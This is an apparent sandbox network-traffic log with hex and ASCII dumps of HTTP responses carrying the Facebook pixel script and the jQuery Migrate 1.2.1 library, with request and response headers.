                                                                                                                                                                                            2024-11-18 20:00:07 UTC16384INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                            Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1491INData Raw: 68 3d 6a 28 61 29 3b 69 66 28 68 21 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 63 2c 65 76 65 6e 74 5f 74 79 70 65 3a 64 2c 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3a 68 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 22 43 53 53 22 2c 69 64 3a 62 7d 7d 69 66 28 66 3d 3d 3d 22 43 4f 4e 53 54 41 4e 54 5f 56 41 4c 55 45 22 29 7b 68 3d 67 28 61 29 3b 69 66 28 68 21 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 63 2c 65 76 65 6e 74 5f 74 79 70 65 3a 64 2c 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3a 68 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 22 43 4f 4e 53 54 41 4e 54 5f 56 41 4c 55 45 22 2c 69 64 3a 62 7d 7d 69 66 28 66 3d 3d 3d 22 47 4c 4f 42 41 4c 5f 56 41 52 49 41 42 4c 45 22 29
                                                                                                                                                                                            Data Ascii: h=j(a);if(h!=null)return{domain_uri:c,event_type:d,extractor_config:h,extractor_type:"CSS",id:b}}if(f==="CONSTANT_VALUE"){h=g(a);if(h!=null)return{domain_uri:c,event_type:d,extractor_config:h,extractor_type:"CONSTANT_VALUE",id:b}}if(f==="GLOBAL_VARIABLE")
                                                                                                                                                                                            2024-11-18 20:00:07 UTC14893INData Raw: 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 43 6f 65 72 63 65 50 72 69 6d 69 74 69 76 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 6a 2c 6b 29 7b 76 61 72 20 6d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6d 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 31 3b 62 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 63 3d 61 72 67 75 6d 65 6e 74 73 5b 62 5d 3b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 63 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77
                                                                                                                                                                                            Data Ascii: ered("SignalsFBEventsCoercePrimitives",function(){return function(g,h,j,k){var m={exports:{}};m.exports;(function(){"use strict";var a=Object.assign||function(a){for(var b=1;b<arguments.length;b++){var c=arguments[b];for(var d in c)Object.prototype.hasOw
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1500INData Raw: 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 52 4c 55 74 69 6c 22 29 2c 74 3d 73 2e 67 65 74 55 52 4c 50 61 72 61 6d 65 74 65 72 2c 75 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 47 65 74 56 61 6c 69 64 55 72 6c 22 29 2c 76 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 52 65 73 6f 6c 76 65 4c 69 6e 6b 22 29 3b 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 69 78 65 6c 43 6f 6f 6b 69 65 55 74 69 6c 73 22 29 3b 76 61 72 20 77 3d 73 2e 43 4c 49 43 4b 5f 49 44 5f 50 41 52 41 4d 45 54 45 52 2c 78 3d 73 2e 72 65 61 64 50 61 63 6b 65 64 43 6f 6f 6b 69
                                                                                                                                                                                            Data Ascii: odules("SignalsFBEventsURLUtil"),t=s.getURLParameter,u=f.getFbeventsModules("SignalsFBEventsGetValidUrl"),v=f.getFbeventsModules("SignalsFBEventsResolveLink");s=f.getFbeventsModules("SignalsPixelCookieUtils");var w=s.CLICK_ID_PARAMETER,x=s.readPackedCooki
                                                                                                                                                                                            2024-11-18 20:00:07 UTC14884INData Raw: 65 72 72 65 64 45 76 65 6e 74 73 22 2c 22 4d 69 63 72 6f 64 61 74 61 22 5d 3b 76 61 72 20 4d 3d 7b 41 75 74 6f 6d 61 74 69 63 53 65 74 75 70 3a 73 7d 2c 4e 3d 7b 41 75 74 6f 6d 61 74 69 63 4d 61 74 63 68 69 6e 67 3a 5b 22 69 6e 66 65 72 72 65 64 65 76 65 6e 74 73 22 2c 22 69 64 65 6e 74 69 74 79 22 5d 2c 41 75 74 6f 6d 61 74 69 63 4d 61 74 63 68 69 6e 67 46 6f 72 50 61 72 74 6e 65 72 49 6e 74 65 67 72 61 74 69 6f 6e 73 3a 5b 22 61 75 74 6f 6d 61 74 69 63 6d 61 74 63 68 69 6e 67 66 6f 72 70 61 72 74 6e 65 72 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 5d 2c 43 6f 6d 6d 6f 6e 49 6e 63 6c 75 64 65 73 3a 5b 22 63 6f 6d 6d 6f 6e 69 6e 63 6c 75 64 65 73 22 5d 2c 44 65 66 61 75 6c 74 43 75 73 74 6f 6d 44 61 74 61 3a 5b 22 64 65 66 61 75 6c 74 63 75 73 74 6f 6d 64 61
                                                                                                                                                                                            Data Ascii: erredEvents","Microdata"];var M={AutomaticSetup:s},N={AutomaticMatching:["inferredevents","identity"],AutomaticMatchingForPartnerIntegrations:["automaticmatchingforpartnerintegrations"],CommonIncludes:["commonincludes"],DefaultCustomData:["defaultcustomda
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1500INData Raw: 73 54 79 70 65 64 22 29 2c 65 3d 64 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 64 3d 41 72 72 61 79 28 61 29 2c 66 3d 30 3b 66 3c 61 3b 66 2b 2b 29 64 5b 66 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 66 5d 3b 76 61 72 20 67 3d 64 5b 30 5d 3b 69 66 28 67 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 67 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 67 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 68 3d 67 2e 75 6e 73 61 66 65 50 69 78 65 6c 2c 6a 3d 67 2e 75 6e 73 61 66 65 54 61 72 67 65 74 2c 6b 3d 65 28 68 2c 63 29 2c 6c 3d 6a 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 3f
                                                                                                                                                                                            Data Ascii: sTyped"),e=d.coerce;function g(){for(var a=arguments.length,d=Array(a),f=0;f<a;f++)d[f]=arguments[f];var g=d[0];if(g==null||(typeof g==="undefined"?"undefined":i(g))!=="object")return null;var h=g.unsafePixel,j=g.unsafeTarget,k=e(h,c),l=j instanceof Node?
                                                                                                                                                                                            2024-11-18 20:00:07 UTC14884INData Raw: 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 56 65 72 73 69 6f 6e 69 6e 67 22 29 3b 76 61 72 20 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 63 6f 65 72 63 65 3b 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 63 2e 72 65 64 75 63 65 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7d 2c 67 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 73 73 52 61 74 65 3b 61 2e 6e 61 6d
                                                                                                                                                                                            Data Ascii: ");f.getFbeventsModules("SignalsFBEventsTypeVersioning");var c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.coerce;c=f.getFbeventsModules("SignalsFBEventsUtils");c.reduce;var e=function(){return Math.random()},g={};function i(a){var b=a.passRate;a.nam
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1491INData Raw: 61 29 7b 61 3d 62 28 61 2c 63 29 3b 61 21 3d 6e 75 6c 6c 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 61 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75
                                                                                                                                                                                            Data Ascii: a){a=b(a,c);a!=null&&(this.moduleEncodings=a)}},{key:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==nu
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1491INData Raw: 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 4f 70 65 6e 42 72 69 64 67 65 43 6f 6e 66 69 67 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 3d 62 2e 6f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 28 7b 65 6e 64 70 6f 69
                                                                                                                                                                                            Data Ascii: f.ensureModuleRegistered("SignalsFBEventsOpenBridgeConfigTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a=b.objectWithFields({endpoi


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            25192.168.2.1649743151.101.2.1374436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC362OUTGET /jquery-migrate-1.2.1.js HTTP/1.1
                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:07 UTC566INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 16621
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                            ETag: "28feccc0-40ed"
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Age: 549809
                                                                                                                                                                                            X-Served-By: cache-lga21971-LGA, cache-dfw-kdfw8210058-DFW
                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                            X-Cache-Hits: 864, 1
                                                                                                                                                                                            X-Timer: S1731960007.296799,VS0,VE4
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 2d 20 76 31 2e 32 2e 31 20 2d 20 32 30 31 33 2d 30 35 2d 30 38 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 35 2c 20 32 30 31 33 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 20 6a 51 75 65 72 79 2c 20 77 69 6e 64 6f 77 2c 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 2f 2f 20 53 65 65 20 68 74 74 70 3a 2f 2f 62 75 67 73 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 74 69 63 6b 65 74 2f
                                                                                                                                                                                            Data Ascii: /*! * jQuery Migrate - v1.2.1 - 2013-05-08 * https://github.com/jquery/jquery-migrate * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors; Licensed MIT */(function( jQuery, window, undefined ) {// See http://bugs.jquery.com/ticket/
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 7b 0a 09 09 2f 2f 20 4f 6e 20 45 53 35 20 62 72 6f 77 73 65 72 73 20 28 6e 6f 6e 2d 6f 6c 64 49 45 29 2c 20 77 61 72 6e 20 69 66 20 74 68 65 20 63 6f 64 65 20 74 72 69 65 73 20 74 6f 20 67 65 74 20 70 72 6f 70 3b 0a 09 09 2f 2f 20 61 6c 6c 6f 77 20 70 72 6f 70 65 72 74 79 20 74 6f 20 62 65 20 6f 76 65 72 77 72 69 74 74 65 6e 20 69 6e 20 63 61 73 65 20 73 6f 6d 65 20 6f 74 68 65 72 20 70 6c 75 67 69 6e 20 77 61 6e 74 73 20 69 74 0a 09 09 74 72 79 20 7b 0a 09 09 09 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 20 6f 62 6a 2c 20 70 72 6f 70 2c 20 7b 0a 09 09 09 09 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 20 74 72 75 65 2c 0a 09 09 09 09 65 6e 75 6d 65 72 61 62 6c 65 3a 20 74 72 75 65 2c 0a 09 09 09 09 67 65 74 3a 20 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                            Data Ascii: {// On ES5 browsers (non-oldIE), warn if the code tries to get prop;// allow property to be overwritten in case some other plugin wants ittry {Object.defineProperty( obj, prop, {configurable: true,enumerable: true,get: function
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 72 6f 70 28 20 6a 51 75 65 72 79 2c 20 22 61 74 74 72 46 6e 22 2c 20 61 74 74 72 46 6e 20 7c 7c 20 7b 7d 2c 20 22 6a 51 75 65 72 79 2e 61 74 74 72 46 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 20 29 3b 0a 0a 6a 51 75 65 72 79 2e 61 74 74 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 2c 20 76 61 6c 75 65 2c 20 70 61 73 73 20 29 20 7b 0a 09 76 61 72 20 6c 6f 77 65 72 4e 61 6d 65 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 0a 09 09 6e 54 79 70 65 20 3d 20 65 6c 65 6d 20 26 26 20 65 6c 65 6d 2e 6e 6f 64 65 54 79 70 65 3b 0a 0a 09 69 66 20 28 20 70 61 73 73 20 29 20 7b 0a 09 09 2f 2f 20 53 69 6e 63 65 20 70 61 73 73 20 69 73 20 75 73 65 64 20 69 6e 74 65 72 6e 61 6c 6c 79 2c 20 77 65 20 6f 6e 6c 79 20 77 61
                                                                                                                                                                                            Data Ascii: rop( jQuery, "attrFn", attrFn || {}, "jQuery.attrFn is deprecated" );jQuery.attr = function( elem, name, value, pass ) {var lowerName = name.toLowerCase(),nType = elem && elem.nodeType;if ( pass ) {// Since pass is used internally, we only wa
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 3d 20 74 72 75 65 20 7c 7c 20 74 79 70 65 6f 66 20 70 72 6f 70 65 72 74 79 20 21 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 26 26 0a 09 09 09 09 09 28 20 61 74 74 72 4e 6f 64 65 20 3d 20 65 6c 65 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 6e 61 6d 65 29 20 29 20 26 26 20 61 74 74 72 4e 6f 64 65 2e 6e 6f 64 65 56 61 6c 75 65 20 21 3d 3d 20 66 61 6c 73 65 20 3f 0a 0a 09 09 09 09 09 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 3a 0a 09 09 09 09 09 75 6e 64 65 66 69 6e 65 64 3b 0a 09 09 09 7d 2c 0a 09 09 09 73 65 74 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 76 61 6c 75 65 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 09 09 09 76 61 72 20 70 72 6f 70 4e 61 6d 65 3b 0a 09 09 09 09 69 66 20 28 20 76 61 6c 75 65 20 3d 3d 3d 20 66 61 6c 73
                                                                                                                                                                                            Data Ascii: = true || typeof property !== "boolean" &&( attrNode = elem.getAttributeNode(name) ) && attrNode.nodeValue !== false ?name.toLowerCase() :undefined;},set: function( elem, value, name ) {var propName;if ( value === fals
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 75 65 72 79 2e 66 6e 2e 61 74 74 72 28 27 76 61 6c 75 65 27 29 20 6e 6f 20 6c 6f 6e 67 65 72 20 67 65 74 73 20 70 72 6f 70 65 72 74 69 65 73 22 29 3b 0a 09 09 7d 0a 09 09 72 65 74 75 72 6e 20 6e 61 6d 65 20 69 6e 20 65 6c 65 6d 20 3f 0a 09 09 09 65 6c 65 6d 2e 76 61 6c 75 65 20 3a 0a 09 09 09 6e 75 6c 6c 3b 0a 09 7d 2c 0a 09 73 65 74 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 76 61 6c 75 65 20 29 20 7b 0a 09 09 76 61 72 20 6e 6f 64 65 4e 61 6d 65 20 3d 20 28 20 65 6c 65 6d 2e 6e 6f 64 65 4e 61 6d 65 20 7c 7c 20 22 22 20 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 09 09 69 66 20 28 20 6e 6f 64 65 4e 61 6d 65 20 3d 3d 3d 20 22 62 75 74 74 6f 6e 22 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 76 61 6c 75 65 41 74 74 72 53 65 74 2e 61 70 70
                                                                                                                                                                                            Data Ascii: uery.fn.attr('value') no longer gets properties");}return name in elem ?elem.value :null;},set: function( elem, value ) {var nodeName = ( elem.nodeName || "" ).toLowerCase();if ( nodeName === "button" ) {return valueAttrSet.app
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 75 6c 64 20 77 6f 72 6b 2e 0a 09 09 69 66 20 28 20 6d 61 74 63 68 5b 20 30 20 5d 2e 63 68 61 72 41 74 28 20 30 20 29 20 3d 3d 3d 20 22 23 22 20 29 20 7b 0a 09 09 09 6d 69 67 72 61 74 65 57 61 72 6e 28 22 48 54 4d 4c 20 73 74 72 69 6e 67 20 63 61 6e 6e 6f 74 20 73 74 61 72 74 20 77 69 74 68 20 61 20 27 23 27 20 63 68 61 72 61 63 74 65 72 22 29 3b 0a 09 09 09 6a 51 75 65 72 79 2e 65 72 72 6f 72 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 49 6e 76 61 6c 69 64 20 73 65 6c 65 63 74 6f 72 20 73 74 72 69 6e 67 20 28 58 53 53 29 22 29 3b 0a 09 09 7d 0a 09 09 2f 2f 20 4e 6f 77 20 70 72 6f 63 65 73 73 20 75 73 69 6e 67 20 6c 6f 6f 73 65 20 72 75 6c 65 73 3b 20 6c 65 74 20 70 72 65 2d 31 2e 38 20 70 6c 61 79 20 74 6f 6f 0a 09 09 69 66 20 28 20 63 6f 6e 74 65 78 74 20 26
                                                                                                                                                                                            Data Ascii: uld work.if ( match[ 0 ].charAt( 0 ) === "#" ) {migrateWarn("HTML string cannot start with a '#' character");jQuery.error("JQMIGRATE: Invalid selector string (XSS)");}// Now process using loose rules; let pre-1.8 play tooif ( context &
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 65 72 41 67 65 6e 74 20 29 3b 0a 09 62 72 6f 77 73 65 72 20 3d 20 7b 7d 3b 0a 0a 09 69 66 20 28 20 6d 61 74 63 68 65 64 2e 62 72 6f 77 73 65 72 20 29 20 7b 0a 09 09 62 72 6f 77 73 65 72 5b 20 6d 61 74 63 68 65 64 2e 62 72 6f 77 73 65 72 20 5d 20 3d 20 74 72 75 65 3b 0a 09 09 62 72 6f 77 73 65 72 2e 76 65 72 73 69 6f 6e 20 3d 20 6d 61 74 63 68 65 64 2e 76 65 72 73 69 6f 6e 3b 0a 09 7d 0a 0a 09 2f 2f 20 43 68 72 6f 6d 65 20 69 73 20 57 65 62 6b 69 74 2c 20 62 75 74 20 57 65 62 6b 69 74 20 69 73 20 61 6c 73 6f 20 53 61 66 61 72 69 2e 0a 09 69 66 20 28 20 62 72 6f 77 73 65 72 2e 63 68 72 6f 6d 65 20 29 20 7b 0a 09 09 62 72 6f 77 73 65 72 2e 77 65 62 6b 69 74 20 3d 20 74 72 75 65 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 20 62 72 6f 77 73 65 72 2e 77 65 62 6b
                                                                                                                                                                                            Data Ascii: erAgent );browser = {};if ( matched.browser ) {browser[ matched.browser ] = true;browser.version = matched.version;}// Chrome is Webkit, but Webkit is also Safari.if ( browser.chrome ) {browser.webkit = true;} else if ( browser.webk
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 61 6d 65 20 29 20 7b 0a 09 76 61 72 20 72 65 74 2c 20 65 76 74 2c 0a 09 09 65 6c 65 6d 20 3d 20 74 68 69 73 5b 30 5d 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 73 20 31 2e 37 20 77 68 69 63 68 20 68 61 73 20 74 68 69 73 20 62 65 68 61 76 69 6f 72 20 61 6e 64 20 31 2e 38 20 77 68 69 63 68 20 64 6f 65 73 6e 27 74 0a 09 69 66 20 28 20 65 6c 65 6d 20 26 26 20 6e 61 6d 65 20 3d 3d 3d 20 22 65 76 65 6e 74 73 22 20 26 26 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 31 20 29 20 7b 0a 09 09 72 65 74 20 3d 20 6a 51 75 65 72 79 2e 64 61 74 61 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 20 29 3b 0a 09 09 65 76 74 20 3d 20 6a 51 75 65 72 79 2e 5f 64 61 74 61 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 20 29 3b 0a 09 09 69 66 20 28 20 28 20 72 65 74 20 3d 3d 3d 20 75
                                                                                                                                                                                            Data Ascii: ame ) {var ret, evt,elem = this[0];// Handles 1.7 which has this behavior and 1.8 which doesn'tif ( elem && name === "events" && arguments.length === 1 ) {ret = jQuery.data( elem, name );evt = jQuery._data( elem, name );if ( ( ret === u
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 69 64 65 72 20 69 74 20 65 78 65 63 75 74 61 62 6c 65 0a 09 09 09 09 69 66 20 28 20 21 65 6c 65 6d 2e 74 79 70 65 20 7c 7c 20 72 73 63 72 69 70 74 54 79 70 65 2e 74 65 73 74 28 20 65 6c 65 6d 2e 74 79 70 65 20 29 20 29 20 7b 0a 09 09 09 09 09 2f 2f 20 44 65 74 61 63 68 20 74 68 65 20 73 63 72 69 70 74 20 61 6e 64 20 73 74 6f 72 65 20 69 74 20 69 6e 20 74 68 65 20 73 63 72 69 70 74 73 20 61 72 72 61 79 20 28 69 66 20 70 72 6f 76 69 64 65 64 29 20 6f 72 20 74 68 65 20 66 72 61 67 6d 65 6e 74 0a 09 09 09 09 09 2f 2f 20 52 65 74 75 72 6e 20 74 72 75 74 68 79 20 74 6f 20 69 6e 64 69 63 61 74 65 20 74 68 61 74 20 69 74 20 68 61 73 20 62 65 65 6e 20 68 61 6e 64 6c 65 64 0a 09 09 09 09 09 72 65 74 75 72 6e 20 73 63 72 69 70 74 73 20 3f 0a 09 09 09 09 09 09 73 63
                                                                                                                                                                                            Data Ascii: ider it executableif ( !elem.type || rscriptType.test( elem.type ) ) {// Detach the script and store it in the scripts array (if provided) or the fragment// Return truthy to indicate that it has been handledreturn scripts ?sc
